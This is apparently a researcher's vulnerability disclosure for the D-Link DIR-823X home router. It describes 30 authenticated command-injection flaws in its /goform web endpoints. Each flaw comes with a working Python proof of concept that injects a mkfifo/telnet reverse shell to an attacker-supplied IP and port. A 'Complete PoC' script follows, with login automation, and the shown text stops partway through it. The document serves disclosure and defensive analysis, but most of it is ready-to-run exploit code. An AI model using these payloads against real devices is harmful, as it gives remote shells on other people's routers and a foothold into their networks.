SekiroLove/DIR-823X_Vulnerability_Report.md

## DIR-823X_Vulnerability_Report.md

      
    Raw
  

              DIR-823X_Vulnerability_Report.md
            
          
    D-Link DIR-823X Router Component Vulnerability Report

Overview

This report details vulnerabilities across 30 components of the D-Link DIR-823X router (China region home router), spanning endpoints such as /goform/set_wifidog_settings, /goform/set_mode, /goform/set_device_name, and /goform/delete_offline_device, among others. Each vulnerability enables post-authentication Remote Command Execution (RCE) due to inadequate input validation, primarily the failure to filter special characters like '|', '&', ';', and '#'. These flaws are exploited via crafted HTTP POST requests, allowing attackers to inject malicious commands and establish reverse shell connections to arbitrary servers.
The affected scope includes all DIR-823X devices up to the latest firmware version 240802, despite prior attempts at filtering in earlier releases. The root causes vary slightly: 27 components suffer from insufficient parameter sanitization (e.g., wd_enable, lan_gateway), while the final three (set_mode, set_device_name, delete_offline_device) are specifically tied to insecure calls to subfunctions like 0x41E310 and 0x4139A4, which use popen without filtering. In all cases, the consequence is severe: full device compromise, granting attackers complete control over the router, including the ability to execute arbitrary commands, alter configurations, or use the device as a pivot for further attacks.
This systemic issue highlights a critical lack of secure coding practices in the router’s firmware, persisting across updates. The vulnerabilities were validated with Proofs of Concept (PoCs) demonstrating command injection and reverse shell establishment, underscoring the urgency for mitigation and firmware patches as of March 01, 2025.
For more information on the affected product:

Official D-Link Website: D-Link | Welcome (dlink.com.cn)
Product Link (China Region): DIR-823X AX3000双频无线千兆路由


Video Demonstration

This PoC Demo showcases partial functionality of the exploit, with the complete PoC provided at the end of the article.
Watch it here: PoC Demo Video
Component 1: Wifidog Settings Module (/goform/set_wifidog_settings)

Vulnerability Description

The Wifidog settings interface is vulnerable to RCE due to the wd_enable parameter not filtering '|' and '&', allowing command injection for a reverse connection. This stems from insufficient sanitization, as shown below, a flaw also affecting Components 2-27 (e.g., set_ac_server, set_lan_settings).


Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_wifidog_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wifidog_settings"
    evil_Ip_port = f"{ip} {port}"
    payload = {

        "wd_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test1 && telnet {evil_Ip_port} 0</tmp/test1|/bin/sh > /tmp/test1 ",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 2: AC Server Settings Module (/goform/set_ac_server)

Vulnerability Description

The AC server settings interface is vulnerable to RCE. The ac_server_mode parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_ac_server_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ac_server"
    payload = {
        "ac_server_mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test2 && telnet {ip} {port} 0</tmp/test2|/bin/sh > /tmp/test2",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 3: LAN Settings Module (/goform/set_lan_settings)

Vulnerability Description

The LAN settings interface is vulnerable to RCE. The dhcpd_startip parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_lan_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_lan_settings"
    payload = {
        "ipaddr": "1",
        "netmask": "1",
        "dhcpd_enabled": "1",
        "dhcpd_startip": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test3 && telnet {ip} {port} 0</tmp/test3|/bin/sh > /tmp/test3",
        "dhcpd_limit": "1",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 4: DDNS Settings Module (/goform/set_ddns)

Vulnerability Description

The DDNS settings interface is vulnerable to RCE. The ddnsType parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_ddns_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ddns"
    payload = {
        "enable": "0",
        "ddnsDomainName": "1",
        "ddnsUserName": "1",
        "ddnsPwd": "1",
        "ddnsType": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test4 && telnet {ip} {port} 0</tmp/test4|/bin/sh > /tmp/test4",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 5: Static Route Table Module (/goform/set_static_route_table)

Vulnerability Description

The static route table interface is vulnerable to RCE. The gateway parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_static_route_table_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_static_route_table"
    payload = {
        "modmun": "1",
        "interface": "1",
        "destip": "1",
        "netmask": "1",
        "gateway": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test5 && telnet {ip} {port} 0</tmp/test5|/bin/sh > /tmp/test5",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 6: Static Leases Module (/goform/set_static_leases)

Vulnerability Description

The static leases interface is vulnerable to RCE. The macaddr parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_static_leases_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_static_leases"
    payload = {
        "modmun": "0",
        "hostname": "1",
        "ipaddr": "1",
        "macaddr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test6 && telnet {ip} {port} 0</tmp/test6|/bin/sh > /tmp/test6",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 7: Server Settings Module (/goform/set_server_settings)

Vulnerability Description

The server settings interface is vulnerable to RCE. The terminal_addr parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_server_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_server_settings"
    payload = {
        "server_ip": "1",
        "server_port": "1",
        "terminal_addr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test7 && telnet {ip} {port} 0</tmp/test7|/bin/sh > /tmp/test7",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 8: Switch Settings Module (/goform/set_switch_settings)

Vulnerability Description

The switch settings interface is vulnerable to RCE. The port parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_switch_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_switch_settings"
    payload = {
        "port": "1\" "+"||"+f" ash -c \"mkfifo /tmp/8 && telnet {ip} {port} 0</tmp/8|/bin/sh > /tmp/8",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 9: Language Settings Module (/goform/set_language)

Vulnerability Description

The language settings interface is vulnerable to RCE. The langSelection parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_language_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_language"
    payload = {
        "langSelection": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/9 && telnet {ip} {port} 0</tmp/9|/bin/sh > /tmp/9",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 10: AC Status Module (/goform/set_ac_status)

Vulnerability Description

The AC status interface is vulnerable to RCE. The ap_randtime parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_ac_status_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ac_status"
    payload = {
        "ap_randtime": "1\" "+"||"+f" ash -c \"mkfifo /tmp/10 && telnet {ip} {port} 0</tmp/10|/bin/sh > /tmp/10",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 11: System Reboot Module (/goform/set_system_reboot)

Vulnerability Description

The system reboot interface is vulnerable to RCE. The mode parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_system_reboot_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_system_reboot"
    payload = {
        "enable": "1",
        "hour": "1",
        "minute": "1",
        "week": "1",
        "mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/11 && telnet {ip} {port} 0</tmp/11|/bin/sh > /tmp/11",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 12: WiFi Blacklists Module (/goform/set_wifi_blacklists)

Vulnerability Description

The WiFi blacklists interface is vulnerable to RCE. The macList parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_wifi_blacklists_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wifi_blacklists"
    payload = {
        "macList": "1\" "+"||"+f" ash -c \"mkfifo /tmp/12 && telnet {ip} {port} 0</tmp/12|/bin/sh > /tmp/12",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 13: Guide Settings Module (/goform/set_guide_settings)

Vulnerability Description

The guide settings interface is vulnerable to RCE. The wan_dns parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_guide_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_guide_settings"
    payload = {
        "proto": "dhcp",
        "wan_dns": "\""+"||"+f"ash -c \"mkfifo /tmp/13&&telnet {ip} {port} 0</tmp/13|/bin/sh>/tmp/13",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 14: QoS Settings Module (/goform/set_qos)

Vulnerability Description

The QoS settings interface is vulnerable to RCE. The qqos_enable parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_qos_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_qos"
    payload = {
        "qqos_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/14 && telnet {ip} {port} 0</tmp/14|/bin/sh > /tmp/14",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 15: Port Forwarding Module (/goform/set_portfw)

Vulnerability Description

The port forwarding interface is vulnerable to RCE. The ipaddr parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_portfw_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_portfw"
    payload = {
        "lanport": "1",
        "wanport": "1",
        "protocol": "1",
        "modmun": "1",
        "ipaddr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/15 && telnet {ip} {port} 0</tmp/15|/bin/sh > /tmp/15",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 16: DMZ Settings Module (/goform/set_dmz)

Vulnerability Description

The DMZ settings interface is vulnerable to RCE. The dmz_enable parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_dmz_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_dmz"
    payload = {
        "dmz_enable": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/16 && telnet {ip} {port} 0</tmp/16|/bin/sh > /tmp/16",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 17: UPnP Settings Module (/goform/set_upnp)

Vulnerability Description

The UPnP settings interface is vulnerable to RCE. The upnp_enable parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_upnp_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_upnp"
    payload = {
        "upnp_enable": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/17 && telnet {ip} {port} 0</tmp/17|/bin/sh > /tmp/17",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 18: NAT Settings Module (/goform/set_nat)

Vulnerability Description

The NAT settings interface is vulnerable to RCE. The nat_enable parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_nat_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_nat"
    payload = {
        "nat_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/18 && telnet {ip} {port} 0</tmp/18|/bin/sh > /tmp/18",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 19: Filtering Settings Module (/goform/set_filtering)

Vulnerability Description

The filtering settings interface is vulnerable to RCE. The proto parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_filtering_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_filtering"
    payload = {
        "sel_mode": "1",
        "modmun": "1",
        "ipaddr": "1",
        "proto": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/19 && telnet {ip} {port} 0</tmp/19|/bin/sh > /tmp/19",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 20: Prohibiting Settings Module (/goform/set_prohibiting)

Vulnerability Description

The prohibiting settings interface is vulnerable to RCE. The ipaddr parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_prohibiting_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_prohibiting"
    payload = {
        "macaddr": "1",
        "ipaddr": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/20 && telnet {ip} {port} 0</tmp/20|/bin/sh > /tmp/20",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 21: IPv6 Settings Module (/goform/set_ipv6)

Vulnerability Description

The IPv6 settings interface is vulnerable to RCE. The dhcpv6_mode parameter fails to filter '&' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_ipv6_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ipv6"
    payload = {
        "router_advertisement": "2",
        "dhcpv6_service": "3",
        "ndp_proxy": "0",
        "dhcpv6_mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/21 && telnet {ip} {port} 0</tmp/21|/bin/sh > /tmp/21",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 22: NTP Settings Module (/goform/set_ntp)

Vulnerability Description

The NTP settings interface is vulnerable to RCE. The ntp_zone_val parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_ntp_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ntp"
    payload = {
        "ntp_zone_name": "2",
        "ntp_client": "3",
        "ntp_zone_val": "1\" "+"||"+f" ash -c \"mkfifo /tmp/22 && telnet {ip} {port} 0</tmp/22|/bin/sh > /tmp/22",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 23: Diagnostic Ping Module (/goform/diag_ping)

Vulnerability Description

The diagnostic ping interface is vulnerable to Remote Command Execution (RCE). Due to incorrect filtering, the target_addr parameter is inadequately sanitized, allowing attackers to inject malicious commands that are concatenated by snprintf and executed via a system call. This enables the establishment of a reverse connection to a specified server using unfiltered special characters like '|'.

Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_diag_ping_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_ping"
    payload = {
        "target_addr": f"|| ash -c \"mkfifo /tmp/23 && telnet {ip} {port} 0</tmp/23|/bin/sh > /tmp/23 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 24: Diagnostic Traceroute Module (/goform/diag_traceroute)

Vulnerability Description

The diagnostic traceroute interface is vulnerable to Remote Command Execution (RCE). Incorrect filtering permits the target_addr parameter to include unfiltered special characters such as '|', which are then concatenated by snprintf into a command string executed via system, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_diag_traceroute_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_traceroute"
    payload = {
        "target_addr": f"|| ash -c \"mkfifo /tmp/24 && telnet {ip} {port} 0</tmp/24|/bin/sh > /tmp/24 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response


Component 25: Diagnostic Nslookup Module (/goform/diag_nslookup)

Vulnerability Description

The diagnostic nslookup interface is vulnerable to Remote Command Execution (RCE). The vulnerability stems from incorrect filtering of the target_addr parameter, which allows special characters like '|' to pass through. These are subsequently concatenated by snprintf into a command executed via system, enabling attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_diag_nslookup_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_nslookup"
    payload = {
        "target_addr": f"|| ash -c \"mkfifo /tmp/25 && telnet {ip} {port} 0</tmp/25|/bin/sh > /tmp/25 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response


Component 26: Delete Prohibiting Module (/goform/delete_prohibiting)

Vulnerability Description

The delete prohibiting interface is vulnerable to RCE. The delvalue parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.

Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_delete_prohibiting_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/delete_prohibiting"
    payload = {
        "delvalue": f"||mkfifo /tmp/0&&telnet {ip} {port} 0</tmp/0|/bin/sh>/tmp/0\"#",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 27: WAN Settings Module (/goform/set_wan_settings)

Vulnerability Description

The WAN settings interface is vulnerable to RCE. The wan_dns parameter fails to filter '|' symbols, allowing attackers to inject commands that establish a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_wan_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wan_settings"
    payload = {
        "proto": "dhcp",
        "wan_dns": "\""+"||"+f"ash -c \"mkfifo /tmp/27&&telnet {ip} {port} 0</tmp/27|/bin/sh>/tmp/27",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 28: Mode Settings Module (/goform/set_mode)

Vulnerability Description

The mode settings interface is vulnerable to Remote Command Execution (RCE). Specifically, the subfunction at address 0x41E310 within the set_mode handler fails to perform any filtering on the parameters lan_gateway and port. This allows attackers to inject malicious commands using unfiltered special characters such as ";", "|", and "&", enabling the establishment of a reverse connection to a specified server.


Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_mode_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_mode"
    payload = {
        "modeSelection": "1",
        "lan_gateway": f"\";mkfifo /tmp/28 ; telnet {ip} {port} 0</tmp/28|/bin/sh > /tmp/28 ;#",
        "lan_netmask": "1",
        "lan_ipaddr": "1",
        "port": "1\" "+"||"+f" ash -c \"mkfifo /tmp/28 && telnet {ip} {port} 0</tmp/28|/bin/sh > /tmp/28",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 29: Device Name Settings Module (/goform/set_device_name)

Vulnerability Description

The device name settings interface is vulnerable to RCE. The subfunction at 0x4139A4, called internally, uses popen without filtering, allowing the mac parameter to accept unfiltered input with ';' and '|' for command injection and reverse shell creation. This same root cause affects the subsequent vulnerability (Component 30).


Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_set_device_name_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_device_name"
    payload = {
        "device_alias": "1",
        "mac": f" ';mkfifo /tmp/29 ; telnet {ip} {port} 0</tmp/29|/bin/sh > /tmp/29 ;'",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

Component 30: Delete Offline Device Module (/goform/delete_offline_device)

Vulnerability Description

The delete offline device interface is vulnerable to Remote Command Execution (RCE). This vulnerability is caused by an internal function invoking the subfunction at address 0x4139A4, which employs popen to execute commands without any input filtering. The delvalue parameter is not sanitized, enabling attackers to inject malicious commands with special characters like ';' and '|', resulting in a reverse connection to a specified server.
Impact


Affected Scope: All DIR-823X devices up to firmware version 240802
Consequences: Full device compromise.

PoC

def send_delete_offline_device_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/delete_offline_device"
    payload = {
        "delvalue": f" ';mkfifo /tmp/30 ; telnet {ip} {port} 0</tmp/30|/bin/sh > /tmp/30 ;'",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response


Complete PoC

from pwn import *
import re
import hmac
import hashlib
import requests

__author__ = "sekiro"
__email__ = "sekiro244@gmail.com"

def extract_cookies(response):
    cookie_header = response.headers.get('Set-Cookie', '')
    session_id = re.search(r'sessionid=([^;]+)', cookie_header)
    auth_token = re.search(r'token=([^;]+)', cookie_header)
    session_id = session_id.group(1) if session_id else None
    auth_token = auth_token.group(1) if auth_token else None
    return session_id, auth_token

def fetch_login_page(host_ip):
    url = f"http://{host_ip}/login.html"
    response = requests.get(url)

    if response.status_code == 200:
        session_id, auth_token = extract_cookies(response)
        return session_id, auth_token
    else:
        log.error("Failed to fetch login page.")
        return None, None

def encrypt_password(password, auth_token):
    hashed_password = hmac.new(auth_token.encode(), password.encode(), hashlib.sha256).hexdigest()
    return hashed_password

def submit_login(host_ip, username, hashed_password, session_id, auth_token):
    url = f"http://{host_ip}/goform/login"
    payload = {
        "username": username,
        "password": hashed_password,
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

#--------------------------------------------------------------------

def send_set_wifidog_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wifidog_settings"
    evil_Ip_port = f"{ip} {port}"
    payload = {
        # || -> &&
        "wd_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test1 && telnet {evil_Ip_port} 0</tmp/test1|/bin/sh > /tmp/test1 ",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_ac_server_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ac_server"
    payload = {
        "ac_server_mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test2 && telnet {ip} {port} 0</tmp/test2|/bin/sh > /tmp/test2",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_lan_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_lan_settings"
    payload = {
        "ipaddr": "1",
        "netmask": "1",
        "dhcpd_enabled": "1",
        "dhcpd_startip": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test3 && telnet {ip} {port} 0</tmp/test3|/bin/sh > /tmp/test3",
        "dhcpd_limit": "1",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_ddns_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ddns"
    payload = {
        "enable": "0",
        "ddnsDomainName": "1",
        "ddnsUserName":"1",
        "ddnsPwd":"1",
        "ddnsType": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/test4 && telnet {ip} {port} 0</tmp/test4|/bin/sh > /tmp/test4",

        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_static_route_table_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_static_route_table"
    payload = {
        "modmun": "1",
        "interface": "1",
        "destip":"1",
        "netmask":"1",
        "gateway": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test5 && telnet {ip} {port} 0</tmp/test5|/bin/sh > /tmp/test5",

        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_static_leases_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_static_leases"
    payload = {
        "modmun": "0",
        "hostname": "1",
        "ipaddr":"1",

        "macaddr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test6 && telnet {ip} {port} 0</tmp/test6|/bin/sh > /tmp/test6",

        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_server_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_server_settings"
    payload = {

        "server_ip": "1",
        "server_port":"1",

        "terminal_addr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/test7 && telnet {ip} {port} 0</tmp/test7|/bin/sh > /tmp/test7",

        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_switch_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_switch_settings"
    payload = {
        "port": "1\" "+"||"+f" ash -c \"mkfifo /tmp/8 && telnet {ip} {port} 0</tmp/8|/bin/sh > /tmp/8",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_language_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_language"
    payload = {
        "langSelection": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/9 && telnet {ip} {port} 0</tmp/9|/bin/sh > /tmp/9",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_ac_status_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ac_status"
    payload = {
        "ap_randtime": "1\" "+"||"+f" ash -c \"mkfifo /tmp/10 && telnet {ip} {port} 0</tmp/10|/bin/sh > /tmp/10",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_system_reboot_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_system_reboot"
    payload = {
        "enable":"1",
        "hour":"1",
        "minute":"1",
        "week":"1",
        "mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/11 && telnet {ip} {port} 0</tmp/11|/bin/sh > /tmp/11",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_wifi_blacklists_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wifi_blacklists"
    payload = {

        "macList": "1\" "+"||"+f" ash -c \"mkfifo /tmp/12 && telnet {ip} {port} 0</tmp/12|/bin/sh > /tmp/12",
